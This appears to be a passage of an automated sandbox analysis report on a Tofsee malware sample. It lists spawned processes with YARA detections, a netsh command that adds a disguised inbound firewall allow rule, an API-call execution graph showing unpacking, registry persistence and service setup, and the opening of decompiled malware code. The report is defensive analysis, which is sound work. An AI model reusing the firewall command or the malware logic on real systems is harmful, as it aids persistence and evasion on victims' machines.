                                                                                                                                Commandline:C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d"C:\Users\user\Desktop\OcmKX57vR7.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:13894656 bytes
                                                                                                                                MD5 hash:CD1553A922DBF34673BA9D9D9A0FF5DE
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                Reputation:low

                                                                                                                                General

                                                                                                                                Target ID:14
                                                                                                                                Start time:01:01:27
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                Imagebase:0xf70000
                                                                                                                                File size:82944 bytes
                                                                                                                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:01:01:27
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:01:01:29
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:svchost.exe
                                                                                                                                Imagebase:0x350000
                                                                                                                                File size:44520 bytes
                                                                                                                                MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen

                                                                                                                                General

                                                                                                                                Target ID:18
                                                                                                                                Start time:01:01:32
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:01:01:33
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:01:01:34
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:01:01:34
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:01:01:35
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                Imagebase:0x7ff70eae0000
                                                                                                                                File size:163336 bytes
                                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:23
                                                                                                                                Start time:01:01:35
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:24
                                                                                                                                Start time:01:01:36
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:26
                                                                                                                                Start time:01:01:48
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:27
                                                                                                                                Start time:01:01:48
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:28
                                                                                                                                Start time:01:02:05
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:30
                                                                                                                                Start time:01:02:16
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:34
                                                                                                                                Start time:01:02:31
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                Imagebase:0x7ff73c930000
                                                                                                                                File size:51288 bytes
                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:36
                                                                                                                                Start time:01:02:36
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                Imagebase:0x7ff7b0320000
                                                                                                                                File size:455656 bytes
                                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                General

                                                                                                                                Target ID:37
                                                                                                                                Start time:01:02:36
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:2.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:14.6%
                                                                                                                                  Signature Coverage:38.7%
                                                                                                                                  Total number of Nodes:390
                                                                                                                                  Total number of Limit Nodes:22
                                                                                                                                  execution_graph 27881 418140 27882 41817e 27881->27882 27884 418187 7 library calls 27881->27884 27885 417880 27882->27885 27886 417893 __callnewh 27885->27886 27888 4178a8 __callnewh 27885->27888 27886->27888 27889 417910 27886->27889 27888->27884 27890 417921 27889->27890 27891 41795b RtlAllocateHeap 27890->27891 27892 417972 _V6_HeapAlloc 27890->27892 27891->27892 27892->27886 27893 4160e0 27894 4160f1 27893->27894 27897 4160f6 27893->27897 27908 41ad60 27894->27908 27896 41610b 27897->27896 27899 40c125 27897->27899 27912 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA 27899->27912 27901 40c12d 27914 40e654 13 API calls 27901->27914 27903 40c2bd 27915 40e654 13 API calls 27903->27915 27905 40c2c9 27916 40e654 13 API calls 27905->27916 27907 40c2d5 27907->27897 27909 41ad75 27908->27909 27910 41ad6e 27908->27910 27909->27897 27917 41a1c0 27910->27917 27913 40ec7e 27912->27913 27913->27901 27914->27903 27915->27905 27916->27907 27918 41a1fe __getptd getSystemCP ___updatetmbcinfo 27917->27918 27920 41a279 __setmbcp 27918->27920 27921 41a570 27918->27921 27920->27909 27923 41a58c getSystemCP 27921->27923 27922 41a598 __setmbcp_nolock 27922->27920 27923->27922 27924 41a5dc __setmbcp_nolock 27923->27924 27927 41a707 __setmbcp_nolock 27923->27927 27925 41aa20 setSBUpLow LCMapStringW 27924->27925 27925->27922 27927->27922 27928 41aa20 27927->27928 27930 41aa49 ___crtLCMapStringW 27928->27930 27929 41ab9c 27929->27922 27930->27929 27934 422a30 27930->27934 27933 422a30 ___crtLCMapStringA LCMapStringW 27933->27929 27935 422a44 27934->27935 27938 422a90 27935->27938 27937 41ab65 27937->27933 27939 422aa1 LCMapStringW 27938->27939 27940 422abd __freea strncnt __MarkAllocaS ___convertcp ___ansicp 27938->27940 27939->27940 27940->27937 27941 416f00 27944 416e30 27941->27944 27945 416e4b __crt_wait_module_handle 27944->27945 27946 416eb3 RtlEncodePointer 27945->27946 27947 416ebd 27945->27947 27946->27947 27948 416280 27949 416298 27948->27949 27951 41629d ___setargv _parse_cmdline 27948->27951 27950 41ad60 ___initmbctable LCMapStringW 27949->27950 27950->27951 27952 417710 HeapCreate 27953 41773a ___sbh_heap_init __heap_init 27952->27953 27954 417020 27955 417032 __crt_wait_module_handle 27954->27955 27956 416e30 __encode_pointer RtlEncodePointer 27955->27956 27963 41703e __encode_pointer __initptd __mtterm 27955->27963 27957 41712d 27956->27957 27958 416e30 __encode_pointer RtlEncodePointer 27957->27958 27959 417141 27958->27959 27960 416e30 __encode_pointer RtlEncodePointer 27959->27960 27961 417155 27960->27961 27962 416e30 __encode_pointer RtlEncodePointer 27961->27962 27962->27963 27964 4169a4 27965 4169ab 27964->27965 27967 40c125 15 API calls 27965->27967 27966 4169c0 ___crtInitCritSecAndSpinCount 27967->27966 27968 ad0005 27973 ad092b GetPEB 27968->27973 27970 ad0030 27975 ad003c 27970->27975 27974 ad0972 27973->27974 27974->27970 27976 ad0049 27975->27976 27990 ad0e0f SetErrorMode SetErrorMode 27976->27990 27981 ad0265 27982 ad02ce VirtualProtect 27981->27982 27984 ad030b 27982->27984 27983 ad0439 VirtualFree 27987 ad04be 27983->27987 27988 ad05f4 LoadLibraryA 27983->27988 27984->27983 27985 ad04e3 LoadLibraryA 27985->27987 27987->27985 27987->27988 27989 ad08c7 27988->27989 27991 ad0223 27990->27991 27992 ad0d90 27991->27992 27993 ad0dad 27992->27993 27994 ad0dbb GetPEB 27993->27994 27995 ad0238 VirtualAlloc 27993->27995 27994->27995 27995->27981 27996 409a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 27997 40ec54 2 API calls 27996->27997 27998 409a95 27997->27998 27999 409aa3 GetModuleHandleA GetModuleFileNameA 27998->27999 28004 40a3c7 27998->28004 28012 409ac4 27999->28012 28000 40a41c CreateThread WSAStartup 28259 40e52e 31 API calls 28000->28259 28001 409afd GetCommandLineA 28013 409b22 28001->28013 28002 40a406 DeleteFileA 28002->28004 28005 40a40d 28002->28005 28004->28000 28004->28002 28004->28005 28008 40a3ed GetLastError 28004->28008 28005->28000 28006 40a445 28260 40eaaf 6 API calls 28006->28260 28008->28005 28010 40a3f8 Sleep 28008->28010 28009 40a44d 28261 401d96 56 API calls 28009->28261 28010->28002 28012->28001 28016 409c0c 28013->28016 28023 409b47 28013->28023 28014 40a457 28262 4080c9 98 API calls codecvt 28014->28262 28115 4096aa 28016->28115 28017 40a45f CreateThread 28263 405e6c 15 API calls 28017->28263 28020 40a470 28264 403132 12 API calls 28020->28264 28027 409b96 lstrlenA 28023->28027 28030 409b58 28023->28030 28024 40a1d2 28031 40a1e3 GetCommandLineA 28024->28031 28025 409c39 28028 40a167 GetModuleHandleA GetModuleFileNameA 28025->28028 28121 404280 CreateEventA 28025->28121 28026 40a475 28032 40c125 15 API calls 28026->28032 28027->28030 28029 409c05 ExitProcess 28028->28029 28033 40a189 28028->28033 28030->28029 28037 40675c 21 API calls 28030->28037 28057 40a205 28031->28057 28035 40a47a 28032->28035 28033->28029 28039 40a1b2 GetDriveTypeA 28033->28039 28265 408db1 13 API calls 28035->28265 28040 409be3 28037->28040 28039->28029 28042 40a1c5 28039->28042 28040->28029 28220 406a60 CreateFileA 28040->28220 28041 40a47f Sleep 28048 40a491 28041->28048 28256 409145 11 API calls 28042->28256 28046 40a1cc 28046->28029 28049 40a49f GetTickCount 28048->28049 28051 40a4be Sleep 28048->28051 28056 40a4b7 GetTickCount 28048->28056 28266 40c913 207 API calls codecvt 28048->28266 28049->28048 28049->28051 28051->28048 28053 409ca0 GetTempPathA 28054 409e3e 28053->28054 28055 409cba 28053->28055 28060 409e6b GetEnvironmentVariableA 28054->28060 28064 409e04 28054->28064 28176 4099d2 lstrcpyA 28055->28176 28056->28051 28061 40a285 lstrlenA 28057->28061 28073 40a239 28057->28073 28060->28064 28065 409e7d 28060->28065 28061->28073 28062 40a15d 28062->28028 28062->28029 28255 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 28064->28255 28066 4099d2 16 API calls 28065->28066 28067 409e9d 28066->28067 28067->28064 28072 409eb0 lstrcpyA lstrlenA 28067->28072 28070 409d5f 28239 406cc9 28070->28239 28071 40a3c2 28258 4098f2 41 API calls 28071->28258 28075 409ef4 28072->28075 28257 406ec3 GetUserNameW LookupAccountNameW 28073->28257 28078 406dc2 6 API calls 28075->28078 28082 409f03 28075->28082 28077 40a35f 28077->28071 28077->28077 28085 40a37b 28077->28085 28078->28082 28079 40a39d StartServiceCtrlDispatcherA 28079->28071 28081 409cf6 28183 409326 28081->28183 28083 409f32 RegOpenKeyExA 28082->28083 28086 409f0e 28082->28086 28084 409f48 RegSetValueExA RegCloseKey 28083->28084 28089 409f70 28083->28089 28084->28089 28085->28079 28086->28082 28095 409f9d GetModuleHandleA GetModuleFileNameA 28089->28095 28090 409e0c DeleteFileA 28090->28054 28091 409dde GetFileAttributesExA 28091->28090 28092 409df7 28091->28092 28092->28064 28094 409dff 28092->28094 28249 4096ff RegOpenKeyExA RegDeleteValueA RegCloseKey 28094->28249 28097 409fc2 28095->28097 28098 40a093 28095->28098 28097->28098 28104 409ff1 GetDriveTypeA 28097->28104 28099 40a103 CreateProcessA 28098->28099 28102 40a0a4 wsprintfA 28098->28102 28100 40a13a 28099->28100 28101 40a12a DeleteFileA 28099->28101 28100->28064 28254 4096ff RegOpenKeyExA RegDeleteValueA RegCloseKey 28100->28254 28101->28100 28250 402544 28102->28250 28104->28098 28106 40a00d 28104->28106 28105 40a0d3 lstrcatA 28252 40ee2a 28105->28252 28109 40a02d lstrcatA 28106->28109 28111 40a046 28109->28111 28112 40a052 lstrcatA 28111->28112 28113 40a064 lstrcatA 28111->28113 28112->28113 28113->28098 28114 40a081 lstrcatA 28113->28114 28114->28098 28116 4096b9 28115->28116 28267 4073ff 28116->28267 28118 4096e2 28119 4096f7 28118->28119 28287 40704c 28118->28287 28119->28024 28119->28025 28122 4042a5 28121->28122 28123 40429d 28121->28123 28311 403ecd 6 API calls 28122->28311 28123->28028 28148 40675c 28123->28148 28125 4042b0 28312 404000 28125->28312 28128 4043c1 CloseHandle 28128->28123 28129 4042ce 28318 403f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 28129->28318 28131 4042eb 28319 403f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 28131->28319 28133 4042fb 28134 4043ba CloseHandle 28133->28134 28135 404318 28133->28135 28134->28128 28320 403f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 28135->28320 28137 404331 28321 403f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 28137->28321 28139 40434a 28322 40ebcc GetProcessHeap RtlAllocateHeap 28139->28322 28143 404389 28326 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 28143->28326 28145 40438f 28327 403f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 28145->28327 28147 40439f CloseHandle CloseHandle 28147->28123 28149 406784 CreateFileA 28148->28149 28150 40677a SetFileAttributesA 28148->28150 28151 4067a4 CreateFileA 28149->28151 28152 4067b5 28149->28152 28150->28149 28151->28152 28153 4067c5 28152->28153 28154 4067ba SetFileAttributesA 28152->28154 28155 406977 28153->28155 28156 4067cf GetFileSize 28153->28156 28154->28153 28155->28028 28155->28053 28155->28054 28157 4067e5 28156->28157 28175 406965 28156->28175 28159 4067ed ReadFile 28157->28159 28157->28175 28158 40696e FindCloseChangeNotification 28158->28155 28160 406811 SetFilePointer 28159->28160 28159->28175 28161 40682a ReadFile 28160->28161 28160->28175 28162 406848 SetFilePointer 28161->28162 28161->28175 28163 406867 28162->28163 28162->28175 28164 4068d5 28163->28164 28165 406878 ReadFile 28163->28165 28164->28158 28167 40ebcc 4 API calls 28164->28167 28166 406891 28165->28166 28169 4068d0 28165->28169 28166->28165 28166->28169 28168 4068f8 28167->28168 28170 406900 SetFilePointer 28168->28170 28168->28175 28169->28164 28171 40695a 28170->28171 28172 40690d ReadFile 28170->28172 28331 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 28171->28331 28172->28171 28174 406922 28172->28174 28174->28158 28175->28158 28177 4099eb 28176->28177 28178 409a2f lstrcatA 28177->28178 28179 40ee2a 28178->28179 28180 409a4b lstrcatA 28179->28180 28181 406a60 13 API calls 28180->28181 28182 409a60 28181->28182 28182->28054 28182->28081 28233 406dc2 28182->28233 28332 401910 28183->28332 28186 40934a GetModuleHandleA GetModuleFileNameA 28188 40937f 28186->28188 28189 4093a4 28188->28189 28190 4093d9 28188->28190 28191 4093c3 wsprintfA 28189->28191 28192 409401 wsprintfA 28190->28192 28193 409415 28191->28193 28192->28193 28196 406cc9 5 API calls 28193->28196 28217 4094a0 28193->28217 28195 4094ac 28197 40962f 28195->28197 28198 4094e8 RegOpenKeyExA 28195->28198 28201 409439 28196->28201 28202 409646 28197->28202 28350 401820 17 API calls 28197->28350 28200 409502 28198->28200 28206 4094fb 28198->28206 28204 40951f RegQueryValueExA 28200->28204 28347 40ef1e lstrlenA 28201->28347 28212 4095d6 28202->28212 28342 4091eb 28202->28342 28209 409530 28204->28209 28210 409539 28204->28210 28206->28197 28207 40958a 28206->28207 28207->28202 28208 409593 28207->28208 28208->28212 28348 40f0e4 lstrlenA SysAllocStringByteLen MultiByteToWideChar 28208->28348 28213 40956e RegCloseKey 28209->28213 28214 409556 RegQueryValueExA 28210->28214 28211 409462 28215 40947e wsprintfA 28211->28215 28212->28090 28212->28091 28213->28206 28214->28209 28214->28213 28215->28217 28334 406edd 28217->28334 28218 4095bb 28218->28212 28349 4018e0 26 API calls 28218->28349 28221 406b8c GetLastError 28220->28221 28222 406a8f GetDiskFreeSpaceA 28220->28222 28223 406b86 28221->28223 28224 406ac5 28222->28224 28232 406ad7 28222->28232 28223->28029 28358 40eb0e LoadLibraryA GetProcAddress 28224->28358 28228 406b56 FindCloseChangeNotification 28228->28223 28231 406b65 GetLastError CloseHandle 28228->28231 28229 406b36 GetLastError CloseHandle 28230 406b7f DeleteFileA 28229->28230 28230->28223 28231->28230 28352 406987 28232->28352 28234 406dd7 28233->28234 28238 406e24 28233->28238 28235 406cc9 5 API calls 28234->28235 28236 406ddc 28235->28236 28236->28236 28237 406e02 GetVolumeInformationA 28236->28237 28236->28238 28237->28238 28238->28070 28240 406cdc GetModuleHandleA GetProcAddress 28239->28240 28241 406dbe lstrcpyA lstrcatA lstrcatA 28239->28241 28242 406d12 GetSystemDirectoryA 28240->28242 28245 406cfd 28240->28245 28241->28081 28243 406d27 GetWindowsDirectoryA 28242->28243 28244 406d1e 28242->28244 28246 406d42 28243->28246 28244->28243 28247 406d8b 28244->28247 28245->28242 28245->28247 28359 40ef1e lstrlenA 28246->28359 28247->28241 28249->28064 28251 402554 28250->28251 28251->28105 28251->28251 28253 40a0ec lstrcatA 28252->28253 28253->28099 28254->28064 28255->28062 28256->28046 28257->28077 28258->28004 28259->28006 28260->28009 28261->28014 28262->28017 28263->28020 28264->28026 28265->28041 28266->28048 28268 40741b 28267->28268 28269 406dc2 6 API calls 28268->28269 28270 40743f 28269->28270 28271 407469 RegOpenKeyExA 28270->28271 28273 4077f9 28271->28273 28283 407487 ___ascii_stricmp 28271->28283 28272 407703 RegEnumKeyA 28274 407714 RegCloseKey 28272->28274 28272->28283 28273->28118 28274->28273 28275 40f1a5 lstrlenA 28275->28283 28276 4074d2 RegOpenKeyExA 28276->28283 28277 40772c 28279 407742 RegCloseKey 28277->28279 28280 40774b 28277->28280 28278 407521 RegQueryValueExA 28278->28283 28279->28280 28281 4077ec RegCloseKey 28280->28281 28281->28273 28282 4076e4 RegCloseKey 28282->28283 28283->28272 28283->28275 28283->28276 28283->28277 28283->28278 28283->28282 28285 40777e GetFileAttributesExA 28283->28285 28286 407769 28283->28286 28284 4077e3 RegCloseKey 28284->28281 28285->28286 28286->28284 28288 407073 28287->28288 28289 4070b9 RegOpenKeyExA 28288->28289 28290 4070d0 28289->28290 28304 4071b8 28289->28304 28291 406dc2 6 API calls 28290->28291 28294 4070d5 28291->28294 28292 40719b RegEnumValueA 28293 4071af RegCloseKey 28292->28293 28292->28294 28293->28304 28294->28292 28296 4071d0 28294->28296 28310 40f1a5 lstrlenA 28294->28310 28297 407205 RegCloseKey 28296->28297 28298 407227 28296->28298 28297->28304 28299 4072b8 ___ascii_stricmp 28298->28299 28300 40728e RegCloseKey 28298->28300 28301 4072cd RegCloseKey 28299->28301 28302 4072dd 28299->28302 28300->28304 28301->28304 28303 407311 RegCloseKey 28302->28303 28306 407335 28302->28306 28303->28304 28304->28119 28305 4073d5 RegCloseKey 28307 4073e4 28305->28307 28306->28305 28308 40737e GetFileAttributesExA 28306->28308 28309 407397 28306->28309 28308->28309 28309->28305 28310->28294 28311->28125 28313 40400b CreateFileA 28312->28313 28314 40402c GetLastError 28313->28314 28315 404052 28313->28315 28314->28315 28316 404037 28314->28316 28315->28123 28315->28128 28315->28129 28316->28315 28317 404041 Sleep 28316->28317 28317->28313 28317->28315 28318->28131 28319->28133 28320->28137 28321->28139 28328 40eb74 28322->28328 28325 403f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 28325->28143 28326->28145 28327->28147 28329 40eb7b GetProcessHeap HeapSize 28328->28329 28330 404350 28328->28330 28329->28330 28330->28325 28331->28175 28333 401924 GetVersionExA 28332->28333 28333->28186 28335 406eef AllocateAndInitializeSid 28334->28335 28341 406f55 28334->28341 28336 406f1c CheckTokenMembership 28335->28336 28339 406f44 28335->28339 28337 406f3b FreeSid 28336->28337 28338 406f2e 28336->28338 28337->28339 28338->28337 28339->28341 28351 406e36 GetUserNameW LookupAccountNameW 28339->28351 28341->28195 28343 40920e 28342->28343 28346 409308 28342->28346 28344 4092f1 Sleep 28343->28344 28345 4092bf ShellExecuteA 28343->28345 28343->28346 28344->28343 28345->28343 28345->28346 28346->28212 28347->28211 28348->28218 28349->28212 28350->28202 28351->28341 28353 4069b9 WriteFile 28352->28353 28355 406a3c 28353->28355 28357 4069ff 28353->28357 28355->28228 28355->28229 28356 406a10 WriteFile 28356->28355 28356->28357 28357->28355 28357->28356 28358->28232 28359->28247 28360 ad0920 TerminateProcess

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00409A6B Relevance: 100.5, APIs: 48, Strings: 9, Instructions: 799stringsleepregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
